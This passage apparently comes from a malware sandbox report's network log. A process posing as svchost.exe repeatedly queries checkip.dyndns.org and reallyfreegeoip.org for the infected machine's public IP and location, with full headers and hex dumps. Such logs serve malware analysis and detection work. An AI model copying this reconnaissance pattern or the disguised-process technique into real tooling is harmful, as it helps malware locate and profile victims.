                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  X-Request-ID: a0c10087d533f06e5c82a07901dbc089
                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 34 2e 31 36 2e 31 39 32 2e 32 32 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 154.16.192.225</body></html>
                                                                                                                                                                                  Oct 24, 2024 18:36:02.848227024 CEST127OUTGET / HTTP/1.1
                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                                                  Oct 24, 2024 18:36:03.004323006 CEST323INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Thu, 24 Oct 2024 16:36:02 GMT
                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                  Content-Length: 106
                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  X-Request-ID: b69653bb14b79f23cb5458509549e3e9
                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 34 2e 31 36 2e 31 39 32 2e 32 32 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 154.16.192.225</body></html>


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  1192.168.11.2049793158.101.44.242808376C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  Oct 24, 2024 18:36:03.618169069 CEST127OUTGET / HTTP/1.1
                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                                                  Oct 24, 2024 18:36:03.774074078 CEST323INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Thu, 24 Oct 2024 16:36:03 GMT
                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                  Content-Length: 106
                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  X-Request-ID: 3a2682d61b3d3a6e1482113907fe4a8f
                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 34 2e 31 36 2e 31 39 32 2e 32 32 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 154.16.192.225</body></html>


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  2192.168.11.2049795158.101.44.242808376C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  Oct 24, 2024 18:36:04.387542963 CEST151OUTGET / HTTP/1.1
                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Oct 24, 2024 18:36:04.545656919 CEST323INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Thu, 24 Oct 2024 16:36:04 GMT
                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                  Content-Length: 106
                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  X-Request-ID: dab4f29261ac0d56cd920e2325d33da1
                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 34 2e 31 36 2e 31 39 32 2e 32 32 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 154.16.192.225</body></html>


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  3192.168.11.2049797158.101.44.242808376C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  Oct 24, 2024 18:36:05.166466951 CEST151OUTGET / HTTP/1.1
                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Oct 24, 2024 18:36:05.740911961 CEST323INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Thu, 24 Oct 2024 16:36:05 GMT
                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                  Content-Length: 106
                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  X-Request-ID: efc3f4ef8377b249050f9897622af240
                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 34 2e 31 36 2e 31 39 32 2e 32 32 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 154.16.192.225</body></html>


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  4192.168.11.2049799158.101.44.242808376C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  Oct 24, 2024 18:36:06.359904051 CEST151OUTGET / HTTP/1.1
                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Oct 24, 2024 18:36:06.517585993 CEST323INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Thu, 24 Oct 2024 16:36:06 GMT
                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                  Content-Length: 106
                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  X-Request-ID: a5313a3475e7cfc8eab12e714a110567
                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 34 2e 31 36 2e 31 39 32 2e 32 32 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 154.16.192.225</body></html>


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  5192.168.11.2049801158.101.44.242808376C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  Oct 24, 2024 18:36:07.130979061 CEST151OUTGET / HTTP/1.1
                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Oct 24, 2024 18:36:07.288815022 CEST323INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Thu, 24 Oct 2024 16:36:07 GMT
                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                  Content-Length: 106
                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  X-Request-ID: cf3f99e5cba2d1ef998f83fae9dafe91
                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 34 2e 31 36 2e 31 39 32 2e 32 32 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 154.16.192.225</body></html>


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  6192.168.11.2049803158.101.44.242808376C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  Oct 24, 2024 18:36:07.915836096 CEST151OUTGET / HTTP/1.1
                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Oct 24, 2024 18:36:08.071583033 CEST323INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Thu, 24 Oct 2024 16:36:08 GMT
                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                  Content-Length: 106
                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  X-Request-ID: 6b2d907e4b159e89228cdd56f9081957
                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 34 2e 31 36 2e 31 39 32 2e 32 32 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 154.16.192.225</body></html>


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  7192.168.11.2049805158.101.44.242808376C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  Oct 24, 2024 18:36:08.719151974 CEST151OUTGET / HTTP/1.1
                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Oct 24, 2024 18:36:08.876076937 CEST323INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Thu, 24 Oct 2024 16:36:08 GMT
                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                  Content-Length: 106
                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  X-Request-ID: 0b00e64086a2b8133633b31cd5f1a1e3
                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 34 2e 31 36 2e 31 39 32 2e 32 32 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 154.16.192.225</body></html>


                                                                                                                                                                                  HTTPS Proxied Packets

                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  0192.168.11.2049791104.21.67.1524438376C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-10-24 16:36:02 UTC87OUTGET /xml/154.16.192.225 HTTP/1.1
                                                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  2024-10-24 16:36:02 UTC882INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Thu, 24 Oct 2024 16:36:02 GMT
                                                                                                                                                                                  Content-Type: application/xml
                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                  vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: max-age=86400
                                                                                                                                                                                  CF-Cache-Status: MISS
                                                                                                                                                                                  Last-Modified: Thu, 24 Oct 2024 16:36:02 GMT
                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QCzrxfOKiZFQhIpB2tilVIEmaA7BEzB4%2Fmw169ZrywZcxmyYIKmfES32bnj08melGuagZyj3xbftIRQQ12%2BnvHzlYn561pTc%2BRR4VdTBS55go6CWJ4nTs4is0pJmlA0nq8qBAthn"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                  CF-RAY: 8d7b622aefb6430d-EWR
                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=95299&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=40103&cwnd=252&unsent_bytes=0&cid=3da19bef7b8569be&ts=646&x=0"
                                                                                                                                                                                  2024-10-24 16:36:02 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 34 2e 31 36 2e 31 39 32 2e 32 32 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 30 31 33 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c
                                                                                                                                                                                  Data Ascii: 167<Response><IP>154.16.192.225</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10013</ZipCode><TimeZone>America/New_York<
                                                                                                                                                                                  2024-10-24 16:36:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  1192.168.11.2049792104.21.67.1524438376C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-10-24 16:36:03 UTC63OUTGET /xml/154.16.192.225 HTTP/1.1
                                                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                                                  2024-10-24 16:36:03 UTC887INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Thu, 24 Oct 2024 16:36:03 GMT
                                                                                                                                                                                  Content-Type: application/xml
                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                  vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: max-age=86400
                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                  Age: 1
                                                                                                                                                                                  Last-Modified: Thu, 24 Oct 2024 16:36:02 GMT
                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lkJd8E0B5hnh1vImXr6pexk1QzxCEa4a92e%2FVDQL14ZX4eByX5JuW72OKZ2Crg83soT%2FCUc1Zz7f4igecDRMbGHRzG27pYTVKApZ7tKWCXyLR8uumqAXUJWD7W6Fr5fbKAWzSCma"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                  CF-RAY: 8d7b62313cfd41ed-EWR
                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=95250&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=40103&cwnd=252&unsent_bytes=0&cid=9903142d99aa4876&ts=258&x=0"
                                                                                                                                                                                  2024-10-24 16:36:03 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 34 2e 31 36 2e 31 39 32 2e 32 32 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 30 31 33 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c
                                                                                                                                                                                  Data Ascii: 167<Response><IP>154.16.192.225</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10013</ZipCode><TimeZone>America/New_York<
                                                                                                                                                                                  2024-10-24 16:36:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  2192.168.11.2049794104.21.67.1524438376C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-10-24 16:36:03 UTC63OUTGET /xml/154.16.192.225 HTTP/1.1
                                                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                                                  2024-10-24 16:36:04 UTC889INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Thu, 24 Oct 2024 16:36:04 GMT
                                                                                                                                                                                  Content-Type: application/xml
                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                  vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: max-age=86400
                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                  Age: 2
                                                                                                                                                                                  Last-Modified: Thu, 24 Oct 2024 16:36:02 GMT
                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O2jmiyHmAY8L4g6R7rkiKLC6qrDtXtKbGA8zAWgXXbwSqqmVP5uX9yC02XuSUL4EaP%2BulzQaueC%2F%2Bqbkfk31DqJ1pP7q27pfeBGYESMDiRD3dOpV4pvgfyrpVrCFQsFXHVBC2qV5"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                  CF-RAY: 8d7b62360cd4558a-EWR
                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=94232&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=40526&cwnd=239&unsent_bytes=0&cid=919372f7e3b0540b&ts=254&x=0"
                                                                                                                                                                                  2024-10-24 16:36:04 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 34 2e 31 36 2e 31 39 32 2e 32 32 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 30 31 33 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c
                                                                                                                                                                                  Data Ascii: 167<Response><IP>154.16.192.225</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10013</ZipCode><TimeZone>America/New_York<
                                                                                                                                                                                  2024-10-24 16:36:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  3192.168.11.2049796104.21.67.1524438376C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-10-24 16:36:04 UTC87OUTGET /xml/154.16.192.225 HTTP/1.1
                                                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  2024-10-24 16:36:04 UTC891INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Thu, 24 Oct 2024 16:36:04 GMT
                                                                                                                                                                                  Content-Type: application/xml
                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                  vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: max-age=86400
                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                  Age: 2
                                                                                                                                                                                  Last-Modified: Thu, 24 Oct 2024 16:36:02 GMT
                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7w2F3UxgTpiu3JodPYpKhROHZzKu8KPvpfQWPZ2W8qQUyQ5xcG%2F%2FunGp4CwAHCl18E3OnNE%2FMxGwpbgBuC9gSSP68wGXSNyOwH2UbNLNXcfA8YxVarmSyecccN%2F3LcJ1D85Aj1tH"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                  CF-RAY: 8d7b623ad8b67cb1-EWR
                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=94781&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=40399&cwnd=252&unsent_bytes=0&cid=c0d6458c2cea6c1e&ts=250&x=0"
                                                                                                                                                                                  2024-10-24 16:36:04 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 34 2e 31 36 2e 31 39 32 2e 32 32 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 30 31 33 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c
                                                                                                                                                                                  Data Ascii: 167<Response><IP>154.16.192.225</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10013</ZipCode><TimeZone>America/New_York<
                                                                                                                                                                                  2024-10-24 16:36:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  4192.168.11.2049798104.21.67.1524438376C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-10-24 16:36:05 UTC87OUTGET /xml/154.16.192.225 HTTP/1.1
                                                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  2024-10-24 16:36:06 UTC885INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Thu, 24 Oct 2024 16:36:06 GMT
                                                                                                                                                                                  Content-Type: application/xml
                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                  vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: max-age=86400
